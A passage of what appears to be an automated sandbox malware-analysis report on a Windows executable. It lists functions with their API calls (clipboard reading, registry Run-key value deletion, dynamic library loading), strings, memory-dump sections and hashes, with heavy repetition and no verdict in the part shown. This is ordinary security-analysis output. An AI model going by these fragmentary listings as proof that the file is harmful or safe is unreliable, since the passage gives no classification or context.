                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemWindow$ClientRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 3857652467-0
                                                                                                      • Opcode ID: 2ec0658b5d4e4b8b45ed11b5361e37e669d432922f7a65f0b14cab60ca4adec7
                                                                                                      • Instruction ID: 39b0bc59052787c31fa0be47496c43408b3b1618e3587cfc5ac7796f203d5fa7
                                                                                                      • Opcode Fuzzy Hash: 2ec0658b5d4e4b8b45ed11b5361e37e669d432922f7a65f0b14cab60ca4adec7
                                                                                                      • Instruction Fuzzy Hash: 1B010476A00219BBDF00EBE8DC55FBE7B7DEB88700F040158F611B61A2C671AA10DBA4
                                                                                                      Function 00426043 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116sleepstringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 00426048
                                                                                                      • Sleep.KERNEL32(00000096,0048047C), ref: 0042607C
                                                                                                        • Part of subcall function 00426439: lstrlenW.KERNEL32(?,000003FF,00426230,00000000,00000000,?,0048047C,?,00000000,00414D97,?,?,?,?,?,00414885), ref: 00426457
                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000), ref: 004260CD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$H_prologSleep
                                                                                                      • String ID: 4AD
                                                                                                      • API String ID: 931742254-1156607891
                                                                                                      • Opcode ID: 11c1f3fcd8429a66a29079d7864e7c885c0fd33a9c169de8fd3c82f8d9616092
                                                                                                      • Instruction ID: 4a30dddd27122d8f9a0b2d6337e94f8616ee1ab425eae7141a6c1be9d33fb121
                                                                                                      • Opcode Fuzzy Hash: 11c1f3fcd8429a66a29079d7864e7c885c0fd33a9c169de8fd3c82f8d9616092
                                                                                                      • Instruction Fuzzy Hash: 0E41D675804218EEDB14EFA4D9469EEB7B8EF04314F60806FE851732C1EB786B44C769
                                                                                                      Function 0042169F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,?), ref: 004216B1
                                                                                                      • SendMessageW.USER32(?,00000433,00000000,?), ref: 004216EC
                                                                                                      • SendMessageW.USER32(?,00000432,00000000,0000002C), ref: 00421717
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Item
                                                                                                      • String ID: ,
                                                                                                      • API String ID: 3888421826-3772416878
                                                                                                      • Opcode ID: 3e3ff3d847481b6fb75f635584c1b91a612b794cd5895a788bd4afdae0d924d2
                                                                                                      • Instruction ID: e5665baada64295f7c02611f98c27c35f43ebbc44d05b6f3011a9d3297f79af1
                                                                                                      • Opcode Fuzzy Hash: 3e3ff3d847481b6fb75f635584c1b91a612b794cd5895a788bd4afdae0d924d2
                                                                                                      • Instruction Fuzzy Hash: BE11AF76E00218AFDB00DFA9DC55ADDBBB4FF4C710F109026EA14BB290D6B59A45CF68
                                                                                                      Function 00434129 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40sleepwindowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 0043412E
                                                                                                      • SetFocus.USER32(?,?,004339AF,00000001,?,00000000,PathToClipboardSlash+,?,00000000,PathToClipboardSlash,?,00000000,PathToClipboard+,?,00000000,PathToClipboard), ref: 0043413B
                                                                                                      • Sleep.KERNEL32(0000012C,?,?,004339AF,00000001,?,00000000,PathToClipboardSlash+,?,00000000,PathToClipboardSlash,?,00000000,PathToClipboard+,?,00000000), ref: 0043414B
                                                                                                        • Part of subcall function 00433F0D: OpenClipboard.USER32(00000000), ref: 00433F17
                                                                                                        • Part of subcall function 00433F0D: RegisterClipboardFormatW.USER32(Shell IDList Array), ref: 00433F36
                                                                                                        • Part of subcall function 00433F0D: GetClipboardData.USER32 ref: 00433F47
                                                                                                        • Part of subcall function 00433F0D: GlobalLock.KERNEL32(00000000), ref: 00433F52
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Clipboard$DataFocusFormatGlobalH_prologLockOpenRegisterSleep
                                                                                                      • String ID: 4AD
                                                                                                      • API String ID: 1036291416-1156607891
                                                                                                      • Opcode ID: b37d669aa8e4c371b57b94edd3502e1553fc73c3d5ef4b951d35d3083167ae3d
                                                                                                      • Instruction ID: ee9676eb42ee1d512edd418de1848ed1cf9006a5db476a311d8b0c36576ccc5e
                                                                                                      • Opcode Fuzzy Hash: b37d669aa8e4c371b57b94edd3502e1553fc73c3d5ef4b951d35d3083167ae3d
                                                                                                      • Instruction Fuzzy Hash: C7015271810209AFDB04EFA0DD4AAEE7B74FB04315F20452FE011B21E1DBB86A84CB58
                                                                                                      Function 004374EA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegOpenKeyW.ADVAPI32(-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 00437509
                                                                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 0043751B
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00437526
                                                                                                      Strings
                                                                                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 004374F7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseDeleteOpenValue
                                                                                                      • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                                                                                      • API String ID: 849931509-3913687870
                                                                                                      • Opcode ID: 0220bb65a57990b1609bbb8ec334c0a7c02d6554820eec917214b62211459a15
                                                                                                      • Instruction ID: 59c5435105357cda73140981fc49627d41e5a9f77ffab6543ae7563a6603dc63
                                                                                                      • Opcode Fuzzy Hash: 0220bb65a57990b1609bbb8ec334c0a7c02d6554820eec917214b62211459a15
                                                                                                      • Instruction Fuzzy Hash: 5DE03037810229EBCF251FB0DC4969A7BA5EB08371F01C125FD18AA210D739C9409F94
                                                                                                      Function 0043551A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(USER32.DLL,00435EA8,?,?,?,?), ref: 00435528
                                                                                                      • GetProcAddress.KERNEL32(?,SetMenuInfo), ref: 00435546
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                      • String ID: SetMenuInfo$USER32.DLL
                                                                                                      • API String ID: 2574300362-3329878150
                                                                                                      • Opcode ID: 98adff75472883bb36f32fb166f88d904f831f7eadf3cd23d295b96331bbcdeb
                                                                                                      • Instruction ID: 5916e2fc36fe8bba6e0fc43ecc7b0183c6b496dbd579211a3983e5e27e86c943
                                                                                                      • Opcode Fuzzy Hash: 98adff75472883bb36f32fb166f88d904f831f7eadf3cd23d295b96331bbcdeb
                                                                                                      • Instruction Fuzzy Hash: FAE0C271620600AFDF619F24EC0971A3AA5F728742F00683AB40A922A4D778A448EF4C
                                                                                                      Function 004261A2 Relevance: 6.1, APIs: 4, Instructions: 74stringkeyboardCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 004261A7
                                                                                                        • Part of subcall function 00426439: lstrlenW.KERNEL32(?,000003FF,00426230,00000000,00000000,?,0048047C,?,00000000,00414D97,?,?,?,?,?,00414885), ref: 00426457
                                                                                                      • lstrcpyW.KERNEL32(?,00000000,00000000,?,0048047C,?,00000000,00414D97,?,?,?,?,?,00414885,00414827), ref: 0042623B
                                                                                                      • lstrcatW.KERNEL32(?,00000000,?,0048047C,?,00000000,00414D97,?,?,?,?,?,00414885,00414827,?,004140C8), ref: 00426249
                                                                                                      • lstrlenW.KERNEL32(?,?,0048047C,?,00000000,00414D97,?,?,?,?,?,00414885,00414827,?,004140C8,00000000), ref: 0042625C
                                                                                                      • lstrcpyW.KERNEL32(?,?,?,0048047C,?,00000000,00414D97,?,?,?,?,?,00414885,00414827,?,004140C8), ref: 00426291
                                                                                                      • GetKeyState.USER32(00000011), ref: 004262B7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpylstrlen$H_prologStatelstrcat
                                                                                                      • String ID:
                                                                                                      • API String ID: 3813051740-0
                                                                                                      • Opcode ID: 3d3dd21fc36d43834e5f190c3a08724ee61f03cf8b3d592b317e78f95e9b16b7
                                                                                                      • Instruction ID: f1b7e4f11773d1db4a9d7f26b3d6fb5537a49fa623217fdb0761840d857ca06a
                                                                                                      • Opcode Fuzzy Hash: 3d3dd21fc36d43834e5f190c3a08724ee61f03cf8b3d592b317e78f95e9b16b7
                                                                                                      • Instruction Fuzzy Hash: 8C21D172D05228ABDB14EBA5DD45ADEB7B8EF08314F1044BAA101B32D1DBB85F44CBA5
                                                                                                      Function 0042D279 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CallWindowProcW.USER32(?,?,?,00000005,?), ref: 0042D29E
                                                                                                      • GetMessagePos.USER32 ref: 0042D2B0
                                                                                                      • ScreenToClient.USER32(?,?), ref: 0042D2CC
                                                                                                      • PtInRect.USER32(?,?,?), ref: 0042D2EE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallClientMessageProcRectScreenWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2980354656-0
                                                                                                      • Opcode ID: 7a72edbe208eb9f7f80a718336dc999f757fa1644bf2837c0e2e88546a471468
                                                                                                      • Instruction ID: 2b02a2273540d2a3acd45090b37fce7c15d31cc95de6c475789917453dd6b7b5
                                                                                                      • Opcode Fuzzy Hash: 7a72edbe208eb9f7f80a718336dc999f757fa1644bf2837c0e2e88546a471468
                                                                                                      • Instruction Fuzzy Hash: 0D11A372E00229AF8F219F94DC898AFBFB9FB04315B504166EC45E2210D7359911D794
                                                                                                      Function 004254DA Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,00000419,?,00000000), ref: 004254F9
                                                                                                      • SendMessageW.USER32(?,0000041D,00000000,?), ref: 00425506
                                                                                                      • ClientToScreen.USER32(?), ref: 00425527
                                                                                                      • SendMessageW.USER32(?,00000403,?,00000001), ref: 00425538
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$ClientScreen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1264711397-0
                                                                                                      • Opcode ID: 21e99f49a25e7fbfcdc5034213d00d10bced2840db0a81dce533fe62294a2d52
                                                                                                      • Instruction ID: 10029316b969c1ebf7fa3ffa1d4ece043839d52826b7b2918982b16436b64cd7
                                                                                                      • Opcode Fuzzy Hash: 21e99f49a25e7fbfcdc5034213d00d10bced2840db0a81dce533fe62294a2d52
                                                                                                      • Instruction Fuzzy Hash: BA01EDB6600308BFD714DF59DC85E9ABBE8EF48710F00841DFA5AA7291D6B0A940CF64
                                                                                                      Function 0042D5E3 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetClientRect.USER32(00000000,00000000), ref: 0042D600
                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0042D622
                                                                                                      • DrawEdge.USER32(?,0000200F,0000000A,0000200F), ref: 0042D63D
                                                                                                      • FillRect.USER32(?,?,0000000D), ref: 0042D64C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
